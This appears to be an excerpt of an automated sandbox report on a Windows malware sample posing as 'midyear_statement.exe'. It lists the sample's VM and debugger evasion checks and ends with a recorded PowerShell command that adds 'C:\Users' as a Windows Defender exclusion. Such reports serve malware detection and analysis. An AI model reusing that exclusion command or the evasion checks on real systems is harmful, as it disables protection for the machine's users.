                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233F7A7 Sleep,ExitProcess,24_2_1233F7A7
                      Source: C:\Windows\System32\svchost.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,24_2_1234A748
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5574Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4195Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifWindow / User API: threadDelayed 9520Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifWindow / User API: foregroundWindowGot 1755Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifAPI coverage: 9.9 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 5574 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 4195 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928Thread sleep count: 143 > 30Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928Thread sleep time: -429000s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924Thread sleep count: 139 > 30Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7924Thread sleep time: -69500s >= -30000sJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928Thread sleep count: 9520 > 30Jump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pif TID: 7928Thread sleep time: -28560000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A5878 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_040A5878
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,24_2_00401612
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,24_2_0040128D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12339253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,24_2_12339253
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,24_2_1234C291
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,24_2_1233C34D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12339665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,24_2_12339665
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12349AF5 FindFirstFileW,FindNextFileW,FindNextFileW,24_2_12349AF5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,24_2_1233BB30
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233783C FindFirstFileW,FindNextFileW,24_2_1233783C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,24_2_1233880C
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1237E879 FindFirstFileExA,24_2_1237E879
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1233BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,24_2_1233BD37
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_146410F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,24_2_146410F1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14646580 FindFirstFileExA,24_2_14646580
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040AE51 FindFirstFileW,FindNextFileW,27_2_0040AE51
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,28_2_00407EF8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12337C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,24_2_12337C97
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00418981 memset,GetSystemInfo,27_2_00418981
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.000000000077B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                      Source: svchost.exe, 00000009.00000002.3646615871.0000026BC202B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000085C000.00000004.00000020.00020000.00000000.sdmp, midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1379159545.00000000124E0000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1405851694.00000000124E9000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, wkrriuhD.pif, 00000018.00000003.1382585003.00000000124E5000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Dhuirrkw.PIF, 00000020.00000003.1637043609.00000000007BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000009.00000002.3644458412.0000026BC2002000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
                      Source: bhv348F.tmp.27.drBinary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: midyear_statement.exe, 00000000.00000002.1362063312.000000000088A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                      Source: svchost.exe, 00000009.00000002.3647045184.0000026BC208D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000`
                      Source: svchost.exe, 00000009.00000002.3646907116.0000026BC2064000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000{#s
                      Source: Dhuirrkw.PIF, 0000001E.00000003.1564727013.00000000007A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                      Source: Dhuirrkw.PIF, 00000020.00000003.1637043609.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000009.00000002.3646811739.0000026BC204B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: C:\Users\user\Desktop\midyear_statement.exeAPI call chain: ExitProcess graph end nodegraph_0-35413
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifAPI call chain: ExitProcess graph end nodegraph_24-111133
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_1236BB22
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_040B7A50
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]24_2_0059113F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_0059113F mov eax, dword ptr fs:[00000030h]24_2_0059113F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005D4097 mov eax, dword ptr fs:[00000030h]24_2_005D4097
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123732B5 mov eax, dword ptr fs:[00000030h]24_2_123732B5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14644AB4 mov eax, dword ptr fs:[00000030h]24_2_14644AB4
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12341CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,24_2_12341CFE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess token adjusted: Debug
                      Source: C:\Windows \System32\2506803.exeCode function: 16_2_613C21C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_613C21C0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_1236BB22
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12364B47 SetUnhandledExceptionFilter,24_2_12364B47
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_123649F9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12364FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_12364FDC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14642639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_14642639
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_146460E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_146460E2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_14642B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_14642B1C

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Adds a directory exclusion to Windows Defender
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
